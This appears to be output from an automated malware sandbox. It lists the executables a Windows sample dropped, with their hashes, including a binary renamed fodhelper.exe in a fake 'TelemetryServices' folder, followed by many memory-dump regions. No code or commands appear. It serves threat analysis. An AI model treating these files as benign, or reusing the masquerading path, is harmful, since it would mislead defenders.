02592bcfbd10785789582618c270f305bb96be79ee315bddcb3dee241861b425862be03eeeb1ae96446669fa7912e31477e01aefed9ae4eb5a8cac2dd9412715

Download Submit
C:\Users\Admin\AppData\Local\Temp\Lbovws.exe

Filesize
273KB

MD5
919cad063b906ff8275fdead62dcebed

SHA1
fce64e935a5254bf521b37c8cf7290b4f3fd9437

SHA256
ab593023cca777fb1e5baab0c43a3f97c6f7bd949060508428d4deee2079a2de

SHA512
02592bcfbd10785789582618c270f305bb96be79ee315bddcb3dee241861b425862be03eeeb1ae96446669fa7912e31477e01aefed9ae4eb5a8cac2dd9412715

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newloads.exe

Filesize
29KB

MD5
5aa50bc32147062229a7ac6f60e15523

SHA1
b4c210df01cc8a3812a25407001ac7caa9391357

SHA256
18ec8f5f89a9410037c153399cc7e6dd49d438803f7747c201bab7d6c548f10b

SHA512
2be12b7640c7abc9132b0beeb1110305fa359023021d2bf9c9b6f4428981688e981d1cb25d9314b1b538e2ca867e940ccb611d71b5dd079c036a312ea2aebaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newloads.exe

Filesize
29KB

MD5
5aa50bc32147062229a7ac6f60e15523

SHA1
b4c210df01cc8a3812a25407001ac7caa9391357

SHA256
18ec8f5f89a9410037c153399cc7e6dd49d438803f7747c201bab7d6c548f10b

SHA512
2be12b7640c7abc9132b0beeb1110305fa359023021d2bf9c9b6f4428981688e981d1cb25d9314b1b538e2ca867e940ccb611d71b5dd079c036a312ea2aebaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updaters.exe

Filesize
9.5MB

MD5
6707658985458997a67e22bf3a228b7d

SHA1
8b844d4b579f95b483eede0a1fcc1e07c4bdd1bc

SHA256
e8de17586393290db45f493536c4d7ae22a57045bba2b5a9bb2e3cad9397a40d

SHA512
4075b885fa2980e609b1b3dd61b5e6d63c5df2f487495b7d883ce8888ba67329108b69634c2618e77610babbaa567b0453de2cb60ebc594b580c840b5814723c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updaters.exe

Filesize
9.5MB

MD5
6707658985458997a67e22bf3a228b7d

SHA1
8b844d4b579f95b483eede0a1fcc1e07c4bdd1bc

SHA256
e8de17586393290db45f493536c4d7ae22a57045bba2b5a9bb2e3cad9397a40d

SHA512
4075b885fa2980e609b1b3dd61b5e6d63c5df2f487495b7d883ce8888ba67329108b69634c2618e77610babbaa567b0453de2cb60ebc594b580c840b5814723c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kdvikfek.kgc.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfctdwzpngfz.xml

Filesize
1KB

MD5
b96318ec452745a5474e6ae39c1e5f22

SHA1
1fd69c12e40c6f30f540ac88340f0d3319a5a71e

SHA256
d637ba0f635b7100a7dcf3e729bf630c52e922b548767cd03e602418b2269ef6

SHA512
b393b2ab91669b9950ed23187a485a87b1775794c5cd18a39a3738281761373cf0c3a2944f506cd25d1476a219fb8209ce9b3d2f12bde021367945e851e5757e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

Filesize
273KB

MD5
919cad063b906ff8275fdead62dcebed

SHA1
fce64e935a5254bf521b37c8cf7290b4f3fd9437

SHA256
ab593023cca777fb1e5baab0c43a3f97c6f7bd949060508428d4deee2079a2de

SHA512
02592bcfbd10785789582618c270f305bb96be79ee315bddcb3dee241861b425862be03eeeb1ae96446669fa7912e31477e01aefed9ae4eb5a8cac2dd9412715

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

Filesize
273KB

MD5
919cad063b906ff8275fdead62dcebed

SHA1
fce64e935a5254bf521b37c8cf7290b4f3fd9437

SHA256
ab593023cca777fb1e5baab0c43a3f97c6f7bd949060508428d4deee2079a2de

SHA512
02592bcfbd10785789582618c270f305bb96be79ee315bddcb3dee241861b425862be03eeeb1ae96446669fa7912e31477e01aefed9ae4eb5a8cac2dd9412715

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

Filesize
273KB

MD5
919cad063b906ff8275fdead62dcebed

SHA1
fce64e935a5254bf521b37c8cf7290b4f3fd9437

SHA256
ab593023cca777fb1e5baab0c43a3f97c6f7bd949060508428d4deee2079a2de

SHA512
02592bcfbd10785789582618c270f305bb96be79ee315bddcb3dee241861b425862be03eeeb1ae96446669fa7912e31477e01aefed9ae4eb5a8cac2dd9412715

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

Filesize
273KB

MD5
919cad063b906ff8275fdead62dcebed

SHA1
fce64e935a5254bf521b37c8cf7290b4f3fd9437

SHA256
ab593023cca777fb1e5baab0c43a3f97c6f7bd949060508428d4deee2079a2de

SHA512
02592bcfbd10785789582618c270f305bb96be79ee315bddcb3dee241861b425862be03eeeb1ae96446669fa7912e31477e01aefed9ae4eb5a8cac2dd9412715

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

Filesize
273KB

MD5
919cad063b906ff8275fdead62dcebed

SHA1
fce64e935a5254bf521b37c8cf7290b4f3fd9437

SHA256
ab593023cca777fb1e5baab0c43a3f97c6f7bd949060508428d4deee2079a2de

SHA512
02592bcfbd10785789582618c270f305bb96be79ee315bddcb3dee241861b425862be03eeeb1ae96446669fa7912e31477e01aefed9ae4eb5a8cac2dd9412715

Download Submit
memory/1068-574-0x0000000003210000-0x000000000323C000-memory.dmp

Filesize
176KB

Download
memory/1068-563-0x0000000000ED0000-0x0000000000F1A000-memory.dmp

Filesize
296KB

Download
memory/1068-565-0x0000000073270000-0x000000007395E000-memory.dmp

Filesize
6.9MB

Download
memory/1068-573-0x00000000017D0000-0x000000000180E000-memory.dmp

Filesize
248KB

Download
memory/1068-600-0x0000000073270000-0x000000007395E000-memory.dmp

Filesize
6.9MB

Download
memory/1068-577-0x0000000005A70000-0x0000000005A80000-memory.dmp

Filesize
64KB

Download
memory/1668-28-0x0000000006DA0000-0x0000000006E06000-memory.dmp

Filesize
408KB

Download
memory/1668-66-0x0000000008DE0000-0x0000000008E13000-memory.dmp

Filesize
204KB

Download
memory/1668-22-0x0000000006E40000-0x0000000007468000-memory.dmp

Filesize
6.2MB

Download
memory/1668-81-0x0000000073270000-0x000000007395E000-memory.dmp

Filesize
6.9MB

Download
memory/1668-82-0x0000000000E70000-0x0000000000E80000-memory.dmp

Filesize
64KB

Download
memory/1668-21-0x0000000000E70000-0x0000000000E80000-memory.dmp

Filesize
64KB

Download
memory/1668-216-0x0000000000E70000-0x0000000000E80000-memory.dmp

Filesize
64KB

Download
memory/1668-20-0x0000000000D40000-0x0000000000D76000-memory.dmp

Filesize
216KB

Download
memory/1668-27-0x00000000074A0000-0x00000000074C2000-memory.dmp

Filesize
136KB

Download
memory/1668-479-0x0000000008AA0000-0x0000000008AA8000-memory.dmp

Filesize
32KB

Download
memory/1668-496-0x000000007EB70000-0x000000007EB80000-memory.dmp

Filesize
64KB

Download
memory/1668-508-0x0000000073270000-0x000000007395E000-memory.dmp

Filesize
6.9MB

Download
memory/1668-29-0x00000000075B0000-0x0000000007900000-memory.dmp

Filesize
3.3MB

Download
memory/1668-79-0x0000000008F10000-0x0000000008FB5000-memory.dmp

Filesize
660KB

Download
memory/1668-30-0x00000000074F0000-0x000000000750C000-memory.dmp

Filesize
112KB

Download
memory/1668-31-0x0000000007F40000-0x0000000007F8B000-memory.dmp

Filesize
300KB

Download
memory/1668-32-0x0000000007CB0000-0x0000000007D26000-memory.dmp

Filesize
472KB

Download
memory/1668-19-0x0000000000E70000-0x0000000000E80000-memory.dmp

Filesize
64KB

Download
memory/1668-70-0x0000000008B80000-0x0000000008B9E000-memory.dmp

Filesize
120KB

Download
memory/1668-65-0x000000007EB70000-0x000000007EB80000-memory.dmp

Filesize
64KB

Download
memory/1668-18-0x0000000073270000-0x000000007395E000-memory.dmp

Filesize
6.9MB

Download
memory/1668-68-0x00000000731A0000-0x00000000731EB000-memory.dmp

Filesize
300KB

Download
memory/2076-13-0x0000000073250000-0x000000007393E000-memory.dmp

Filesize
6.9MB

Download
memory/2076-8-0x0000000005710000-0x0000000005C0E000-memory.dmp

Filesize
5.0MB

Download
memory/2076-7-0x00000000051A0000-0x0000000005206000-memory.dmp

Filesize
408KB

Download
memory/2076-6-0x0000000005100000-0x0000000005192000-memory.dmp

Filesize
584KB

Download
memory/2076-5-0x0000000002970000-0x00000000029BC000-memory.dmp

Filesize
304KB

Download
memory/2076-0-0x00000000004F0000-0x0000000000544000-memory.dmp

Filesize
336KB

Download
memory/2076-4-0x0000000002940000-0x000000000296C000-memory.dmp

Filesize
176KB

Download
memory/2076-3-0x00000000029C0000-0x00000000029D0000-memory.dmp

Filesize
64KB

Download
memory/2076-2-0x0000000002900000-0x000000000293C000-memory.dmp

Filesize
240KB

Download
memory/2076-1-0x0000000073250000-0x000000007393E000-memory.dmp

Filesize
6.9MB

Download
memory/3664-545-0x0000000000B10000-0x0000000000B11000-memory.dmp

Filesize
4KB

Download
memory/3816-510-0x0000000009DA0000-0x0000000009DBA000-memory.dmp

Filesize
104KB

Download
memory/3816-587-0x0000000073270000-0x000000007395E000-memory.dmp

Filesize
6.9MB

Download
memory/3816-26-0x00000000072A0000-0x00000000072B0000-memory.dmp

Filesize
64KB

Download
memory/3816-69-0x00000000731A0000-0x00000000731EB000-memory.dmp

Filesize
300KB

Download
memory/3816-80-0x00000000072A0000-0x00000000072B0000-memory.dmp

Filesize
64KB

Download
memory/3816-67-0x000000007F160000-0x000000007F170000-memory.dmp

Filesize
64KB

Download
memory/3816-83-0x0000000009E30000-0x0000000009EC4000-memory.dmp

Filesize
592KB

Download
memory/3816-517-0x00000000072A0000-0x00000000072B0000-memory.dmp

Filesize
64KB

Download
memory/3816-516-0x0000000009F00000-0x0000000009F22000-memory.dmp

Filesize
136KB

Download
memory/3816-511-0x000000007F160000-0x000000007F170000-memory.dmp

Filesize
64KB

Download
memory/3816-25-0x0000000073270000-0x000000007395E000-memory.dmp

Filesize
6.9MB

Download
memory/3816-509-0x000000000A650000-0x000000000ACC8000-memory.dmp

Filesize
6.5MB

Download
memory/3816-470-0x00000000075A0000-0x00000000075BA000-memory.dmp

Filesize
104KB

Download
memory/3816-220-0x0000000073270000-0x000000007395E000-memory.dmp

Filesize
6.9MB

Download
memory/4128-9-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/4128-15-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/4140-558-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-661-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-606-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-611-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-541-0x0000000000310000-0x0000000000536000-memory.dmp

Filesize
2.1MB

Download
memory/4140-543-0x0000000073270000-0x000000007395E000-memory.dmp

Filesize
6.9MB

Download
memory/4140-614-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-547-0x0000000004DA0000-0x0000000004F8E000-memory.dmp

Filesize
1.9MB

Download
memory/4140-552-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-602-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-554-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-620-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-564-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-590-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-595-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-567-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-641-0x0000000073270000-0x000000007395E000-memory.dmp

Filesize
6.9MB

Download
memory/4140-645-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-648-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-651-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-659-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-582-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-674-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-679-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-684-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-688-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-690-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-692-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-694-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-696-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-698-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-578-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-586-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4140-571-0x0000000004DA0000-0x0000000004F89000-memory.dmp

Filesize
1.9MB

Download
memory/4348-589-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/4348-607-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/4348-596-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/4964-639-0x000001B1D2A60000-0x000001B1D2A7C000-memory.dmp

Filesize
112KB

Download
memory/4964-615-0x000001B1D2770000-0x000001B1D2792000-memory.dmp

Filesize
136KB

Download
memory/4964-621-0x000001B1D2AC0000-0x000001B1D2B36000-memory.dmp

Filesize
472KB

Download
memory/4964-605-0x00007FFAC4590000-0x00007FFAC4F7C000-memory.dmp

Filesize
9.9MB

Download
memory/4964-610-0x000001B1D27C0000-0x000001B1D27D0000-memory.dmp

Filesize
64KB

Download
memory/4964-612-0x000001B1D27C0000-0x000001B1D27D0000-memory.dmp

Filesize
64KB

Download